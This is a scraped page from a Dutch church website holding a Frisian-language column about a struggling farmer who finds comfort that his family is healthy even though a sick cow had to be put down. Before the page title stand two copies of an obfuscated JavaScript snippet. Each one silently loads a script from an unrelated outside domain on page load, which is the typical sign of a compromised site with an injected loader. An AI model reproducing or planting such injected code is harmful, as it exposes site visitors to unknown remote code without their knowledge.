;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Oan de goede kant fan de doar…… - PKN Damwâld

Oan de goede kant fan de doar……

Gepubliceerd op: zaterdag 9 april 2022

Samar in úspraak fan in man dy ’t ik trof op it wurk. Wij rekken oan de praat oer de bourkerij fan de man en it boer wêzen yn dizze tiid. In swier ûnderwerp fansels, want ja, eins bin de boeren in “besmette” groep minsken wurden.  Se ha de ierde fierhinne fernielt as ik guon minsken leauwe mei en soks om ús oan (goedkeap) iten te helpen. Sels op de “stoel” bin der preekfeinten dy’t dat oardiel útdrage! De man fertelde dat it bourkjen him dreech foel de léste jierren, sawol financieel as psychisch. Ik hie mei him “te dwaan”, foarol toen ’t hy sei dat krékt die moarns de feedokter west wie om in ko ynsliepe te litten, om’t it bist slim siik wie…..!

Ik hie gjin wurden op dat stuit, mar de boer wol…..,  Sietse, sa sei er, it wie oan de goede kant fan de doar, dat is it  “goede” nijs fan dizze dei ! Hy seach myn twivel…. Oan de oare kant fan de doar, is de foarein en dér ha wy ús húshâlding, sa sei er, en dy bin allegjér sûn en wol, dat is myn rykdom ! Soargen by de rûs oer ”achterein” en dochs bliid wêze om’t it “oan de oare kant fan de doar”, de foarein dus, wol goed wie ….!!

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns